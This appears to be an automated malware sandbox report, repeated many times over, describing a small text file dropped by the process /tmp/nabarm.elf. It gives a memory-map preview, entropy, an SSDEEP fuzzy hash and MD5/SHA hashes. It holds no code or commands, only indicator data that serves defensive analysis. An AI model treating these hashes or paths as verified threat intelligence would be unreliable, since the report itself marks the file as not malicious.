            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
